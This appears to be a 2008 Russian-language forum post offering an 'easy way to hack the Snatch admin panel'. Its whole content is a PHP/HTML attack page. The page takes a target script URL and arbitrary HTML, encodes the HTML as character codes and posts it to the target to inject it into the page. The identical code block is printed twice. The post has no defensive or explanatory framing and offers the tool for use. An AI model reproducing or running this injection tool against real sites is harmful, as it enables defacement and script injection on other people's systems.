Don Anton
06.05.2008, 20:42
Довольно лёгкий способ взлома админки Snatch
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<?
If (!isset($_POST[adr]))
{
?>
<form action="" method="post" name="form2">
Адрес к файлу снетч htt://bla.bla/bla/bla.php <input name="adr" type="text" size="30">
<textarea name="data" cols="80" rows="20"></textarea>
<input name="go" type="submit" value="GOGOGO">
</form>
<?
}
else
{
$a=$_POST[adr];
echo "Атака на снетч по адресу ".$_POST[adr];
$data=$_POST["data"];
//echo "Входной набор символов: ".$data."<br>";
//echo "Результат: ";
$data2="";
for($i=0; $i<strlen($data); $i++){ $data2.= ord($data[$i]).",";}
?>
<form action="<? echo $a; ?>" method="post" name="form">
<br>Вставить HTML код в страницу:<br>
<textarea name="data" cols="80" rows="20"><? echo $data2; ?></textarea>
<input name="go" type="submit" value="GOGOGO">
</form>
<?
}
?>
</body>
</html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<?
If (!isset($_POST[adr]))
{
?>
<form action="" method="post" name="form2">
Адрес к файлу снетч htt://bla.bla/bla/bla.php <input name="adr" type="text" size="30">
<textarea name="data" cols="80" rows="20"></textarea>
<input name="go" type="submit" value="GOGOGO">
</form>
<?
}
else
{
$a=$_POST[adr];
echo "Атака на снетч по адресу ".$_POST[adr];
$data=$_POST["data"];
//echo "Входной набор символов: ".$data."<br>";
//echo "Результат: ";
$data2="";
for($i=0; $i<strlen($data); $i++){ $data2.= ord($data[$i]).",";}
?>
<form action="<? echo $a; ?>" method="post" name="form">
<br>Вставить HTML код в страницу:<br>
<textarea name="data" cols="80" rows="20"><? echo $data2; ?></textarea>
<input name="go" type="submit" value="GOGOGO">
</form>
<?
}
?>
</body>
</html>